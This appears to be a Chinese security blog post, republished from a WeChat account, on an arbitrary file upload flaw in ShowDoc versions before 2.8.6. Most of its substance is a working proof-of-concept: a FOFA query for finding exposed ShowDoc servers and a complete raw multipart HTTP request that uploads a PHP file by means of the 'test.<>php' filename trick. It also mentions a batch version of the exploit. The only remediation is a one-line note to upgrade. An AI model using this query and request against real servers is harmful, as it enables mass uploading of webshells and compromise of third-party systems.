一漏洞背景
ShowDoc一个非常适合IT团队的 API文档、技术文档工具
历史版本漏洞
漏洞复现
祭fofa大法
fofa app="ShowDoc"
poc利用位置
showdoc < 2.8.6
POST /index.php?s=/home/page/uploadImgPOST /index.php?s=/home/page/uploadImg HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Content-Length: 239Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633Accept-Encoding: gzip----------------------------835846770881083140190633Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"Content-Type: text/plainphpinfo();----------------------------835846770881083140190633--
顺带学了一个批量(单利用写好,批量加几个字符而已的事情) 自动保存到文档
解决方案 就是升级到最新的最新版本
HW结束了 各位师傅辛苦了,写点小东西玩玩,毕竟不是什么厉害的东西 做个小笔记。各路大神见笑了 欢迎大家可以加入群聊。活跃度还可以 。欢迎各位师傅加入。一起讨论和学习 群已经满了 后台回复加群 有人会拉您进去
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考
原文始发于微信公众号(深夜笔记本):ShowDoc任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论